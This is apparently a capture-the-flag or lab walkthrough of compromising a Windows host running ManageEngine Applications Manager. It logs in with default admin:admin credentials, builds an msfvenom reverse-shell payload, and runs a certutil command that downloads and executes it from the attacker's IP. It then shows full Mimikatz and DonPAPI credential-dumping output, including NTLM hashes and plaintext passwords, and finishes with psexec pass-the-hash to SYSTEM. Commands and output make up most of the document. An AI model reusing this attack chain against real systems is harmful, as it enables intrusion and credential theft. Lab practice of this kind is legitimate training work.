NMAP

Nmap scan report for 192.168.250.95

Host is up (0.071s latency).
Not shown: 994 closed tcp ports (reset)
PORT STATE SERVICE VERSION
135/tcp open msrpc Microsoft Windows RPC
139/tcp open netbios-ssn Microsoft Windows netbios-ssn
445/tcp open microsoft-ds?
5001/tcp open commplex-link?
| fingerprint-strings:
| SIPOptions:
| HTTP/1.1 200 OK
| Content-Type: text/html; charset=ISO-8859-1
| Content-Length: 132
|_ MAINSERVER_RESPONSE:<serverinfo method="setserverinfo" mainserver="5001" webserver="44444" pxyname="192.168.45.195"
startpage=""/>
8443/tcp open ssl/https-alt AppManager
|_http-server-header: AppManager
| http-methods:
|_ Supported Methods: GET POST
|_ssl-date: 2024-11-13T19:31:35+00:00; -7h00m01s from scanner time.
| fingerprint-strings:
| FourOhFourRequest:
| HTTP/1.1 404
| Set-Cookie: JSESSIONID_APM_44444=1D6477020301B47504C3DA84CD87D18E; Path=/; Secure; HttpOnly
| Content-Type: text/html;charset=UTF-8
| Content-Length: 973
| Date: Wed, 13 Nov 2024 19:28:24 GMT
| Connection: close
| Server: AppManager
| <!DOCTYPE html>
| <meta http-equiv="X-UA-Compatible" content="IE=edge">
| <html>
| <head>
| <title>Applications Manager</title>
| <link REL="SHORTCUT ICON" HREF="/favicon.ico">
| <!-- Includes commonstyle CSS and dynamic style sheet bases on user selection -->
| <link href="/images/commonstyle.css?rev=14440" rel="stylesheet" type="text/css">
| <link href="/images/newUI/newCommonstyle.css?rev=14260" rel="stylesheet" type="text/css">
| <link href="/images/Grey/style.css?rev=14030" rel="stylesheet" type="text/css">
| <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1">
| </head>
| <body bgcolor="#FFFFFF" leftmarg
| GetRequest:
| HTTP/1.1 200
| Set-Cookie: JSESSIONID_APM_44444=5D551CF82F7FA2F141581E18CA662899; Path=/; Secure; HttpOnly
| Accept-Ranges: bytes
| ETag: W/"261-1591621693000"
| Last-Modified: Mon, 08 Jun 2020 13:08:13 GMT
| Content-Type: text/html
| Content-Length: 261
| Date: Wed, 13 Nov 2024 19:28:24 GMT
| Connection: close
| Server: AppManager
| <!-- $Id$ -->
| <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">
| <html>
| <head>
| <!-- This comment is for Instant Gratification to work applications.do -->
| <script>
| window.open("/webclient/common/jsp/home.jsp", "_top");
| </script>
| </head>
| </html>
| HTTPOptions:
| HTTP/1.1 403
| Set-Cookie: JSESSIONID_APM_44444=13F3D484AF1D497F2A4C55E5582FEDA1; Path=/; Secure; HttpOnly
| Cache-Control: private
| Expires: Thu, 01 Jan 1970 00:00:00 GMT
| Content-Type: text/html;charset=UTF-8
| Content-Length: 1810
| Date: Wed, 13 Nov 2024 19:28:24 GMT
| Connection: close
| Server: AppManager
| <meta http-equiv="X-UA-Compatible" content="IE=edge">
| <meta http-equiv="Content-Type" content="UTF-8">
| <!--$Id$-->
| <html>
| <head>
| <title>Applications Manager</title>
| <link REL="SHORTCUT ICON" HREF="/favicon.ico">
| </head>
 | <body style="background-color:#fff;">
| <style type="text/css">
| #container-error
| border:1px solid #c1c1c1;
| background: #fff; font:11px Arial, Helvetica, sans-serif; width:90%; margin:80px;
| #header-error
| background: #ededed; line-height:18px;
| padding: 15px; color:#000; font-size:8px;
| #header-error h1
|_ margin: 0; color:#000;
| ssl-cert: Subject: commonName=APPLICATIONSMANAGER/organizationName=WebNMS/stateOrProvinceName=Pleasanton/countryName=US
| Issuer: commonName=APPLICATIONSMANAGER/organizationName=WebNMS/stateOrProvinceName=Pleasanton/countryName=US
| Public Key type: rsa
| Public Key bits: 2072
| Signature Algorithm: sha256WithRSAEncryption
| Not valid before: 2019-02-27T11:03:03
| Not valid after: 2050-02-27T11:03:03
| MD5: 094c:a4e7:2020:ec73:1e9f:e5ed:e0ea:5939
|_SHA-1: 834c:a871:c377:20d8:49bd:73d4:0660:b8a8:9a6a:df17
|_http-favicon: Unknown favicon MD5: CF9934E74D25878ED70B430915D931ED
|_http-title: Site doesn't have a title (text/html).
12000/tcp open cce4x?

web have some ports open

https enumeration port 8443

access dashboard
after use creds admin:admin we can see dashboard it uses applications manager name ManageEngine if you need what is ManageEngine you can search in
google but i expland what is it with very quick ManageEngine is a suite of IT management tools from Zoho Corporation designed to help businesses
manage their IT infrastructure. It includes solutions for network monitoring, endpoint management, security, helpdesk, and IT analytics,
providing a centralized way for IT teams to maintain and secure systems.
Get Shell reveres
we can use ManageEngine execution our shell let's gooo
Our Senorice Upload malice file ext bat
Step 1 : Admin --> Upload Files /Binaries
maclice Files
First We need gen Shell with msfvenom
Command

msfvenom -p windows/x64/shell_reverse_tcp lhost=192.168.x.x lport=443 -b '\x00\x2f\x0a' -f exe -o update.exe

Second part Write Command exection Our shell name update.exe

certutil.exe -f -urlcache -split http://192.168.x.x/update.exe c:\windows\temp\update.exe && cmd.exe /c c:\windows\temp\update

Third Part
last part put exection

we Have Permission System now we can read Flag in directory c:\users\administrator\desktop . but we need dump all hashes and password strong plain
Text in system upload Mimikatz And donpapi Tools
Dump Hashes And Password Plain Text
Mimikatz

mimikatz # privilege::debug
Privilege '20' OK

mimikatz # sekurlsa::logonpasswords

Authentication Id : 0 ; 291290 (00000000:000471da)

Session : Interactive from 1
User Name : Administrator
Domain : SECURE
Logon Server : SECURE
Logon Time : 9/28/2024 12:31:58 AM
SID : S-1-5-21-3197578891-1085383791-1901100223-500
msv :
[00000003] Primary
* Username : Administrator
* Domain : SECURE
* NTLM : a51493b0b06e5e35f855245e71af1d14
* SHA1 : 02fb73dd0516da435ac4681bda9cbed3c128e1aa
tspkg :
wdigest :
* Username : Administrator
* Domain : SECURE
 * Password : (null)
kerberos :
* Username : Administrator
* Domain : SECURE
* Password : (null)
ssp :
credman :
[00000000]
* Username : apache
* Domain : era.secura.local
* Password : New2Era4.!
cloudap :

Authentication Id : 0 ; 997 (00000000:000003e5)

Session : Service from 0
User Name : LOCAL SERVICE
Domain : NT AUTHORITY
Logon Server : (null)
Logon Time : 9/28/2024 12:31:54 AM
SID : S-1-5-19
msv :
tspkg :
wdigest :
* Username : (null)
* Domain : (null)
* Password : (null)
kerberos :
* Username : (null)
* Domain : (null)
* Password : (null)
ssp :
credman :
cloudap :

Authentication Id : 0 ; 74336 (00000000:00012260)

Session : Interactive from 1
User Name : DWM-1
Domain : Window Manager
Logon Server : (null)
Logon Time : 9/28/2024 12:31:54 AM
SID : S-1-5-90-0-1
msv :
[00000003] Primary
 * Username : SECURE$
* Domain : SECURA
* NTLM : 983e73c648db56f78e9dfb9698066734
* SHA1 : 8372b4560319480f2ea43971f77b4e4efc37497a
tspkg :
wdigest :
* Username : SECURE$
* Domain : SECURA
* Password : (null)
kerberos :
* Username : SECURE$
* Domain : secura.yzx
* Password : 17 e1 ba 59 b7 4e 94 1c 08 93 23 a1 bf 91 8c 8f a7 8a f6 18 9d a5 b1 84 c9 98 97 f8 30 24 3c e5 3a 21 96 8b 54
81 b8 56 9b de 53 19 ea a3 4c b7 eb 4e 03 d4 64 5b 4a ef 25 2c 4a 17 6e fd bc bc ff 2d 9e 8e 2a e1 67 f2 91 97 8a 92 b7 ad 77 31 5d ba
d8 80 f7 8d 83 52 b7 e4 f0 cc 37 56 bb f9 38 c0 7a cd 04 83 11 a2 69 90 b1 f8 06 d1 2d d4 e1 3e e1 1d b1 53 b2 d5 7d cb 48 ef 64 f5 f1
33 0c c2 c7 e5 6d 3f 0e f4 e5 66 96 05 9f 61 4e 12 fe 88 84 7e 69 93 85 3a c2 dc 56 0e fd 7e af 10 57 5f 7f f0 38 4f be e3 3a cb f7 cd
f5 6e d5 08 e0 57 14 ae fc 31 86 d7 e3 ef 80 42 78 ad c2 40 09 ea c0 c5 10 71 67 8b c2 7e c2 b3 72 9b 3b 66 6e 2c 66 76 03 2b 9d 7a da
d9 20 f5 2b 1a 9e d4 e2 53 2d a1 53 ac 81 86 ed 5a fa c4 6a fe 99 fa
ssp :
credman :
cloudap :

We dump hashes administrator and we obtian new user apache:New2Era4.!

Donpapi

donpapi collect -t 192.168.250.95 -u administrator -H :a51493b0b06e5e35f855245e71af1d14

[💀] [+] DonPAPI Version 2.0.1
[💀] [+] Output directory at /home/r00tv/.donpapi
[💀] [+] Loaded 1 targets
[💀] [+] Recover file available at /home/r00tv/.donpapi/recover/recover_1731565455
[192.168.250.95] [+] Starting gathering credz
[192.168.250.95] [+] Dumping SAM
[192.168.250.95] [$] [SAM] Got 4 accounts
[192.168.250.95] [+] Dumping LSA
[192.168.250.95] [+] Dumping User and Machine masterkeys
[192.168.250.95] [$] [DPAPI] Got 10 masterkeys
[192.168.250.95] [+] Dumping User Chromium Browsers
[192.168.250.95] [+] Dumping User and Machine Certificates
[192.168.250.95] [+] Dumping User and Machine Credential Manager
[192.168.250.95] [$] [CredMan] [SYSTEM] Domain:batch=TaskScheduler:Task:{9EF6DE59-80B5-40A1-993B-4C80A0A07233} -
SECURE\Administrator:Reality2Show4!.?
 [192.168.250.95] [+] Gathering recent files and desktop files
[192.168.250.95] [+] Dumping User Firefox Browser
[192.168.250.95] [+] Dumping MobaXterm credentials
[192.168.250.95] [+] Dumping MRemoteNg Passwords
[192.168.250.95] [+] Dumping User's RDCManager
[192.168.250.95] [+] Dumping SCCM Credentials
[192.168.250.95] [+] Dumping User and Machine Vaults
[192.168.250.95] [+] Dumping VNC Credentials
[192.168.250.95] [+] Dumping Wifi profiles
DonPAPI running against 1 targets ━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━ 100% 0:00:00

Username Password hash

administrator Reality2Show4!.? a51493b0b06e5e35f855245e71af1d14
apache New2Era4.! --

login with NTLM administrator

psexec.py [email protected] -hashes :a51493b0b06e5e35f855245e71af1d14

Impacket v0.13.0.dev0+20241024.90011.835e1755 - Copyright Fortra, LLC and its affiliated companies

[*] Requesting shares on 192.168.250.95.....

[*] Found writable share ADMIN$
[*] Uploading file zWLrgcrQ.exe
[*] Opening SVCManager on 192.168.250.95.....
[*] Creating service ywdO on 192.168.250.95.....
[*] Starting service ywdO.....
[!] Press help for extra shell commands
Microsoft Windows [Version 10.0.19042.1706]
(c) Microsoft Corporation. All rights reserved.

C:\Windows\system32> hostname
secure

C:\Windows\system32> whoami
nt authority\system

C:\Windows\system32>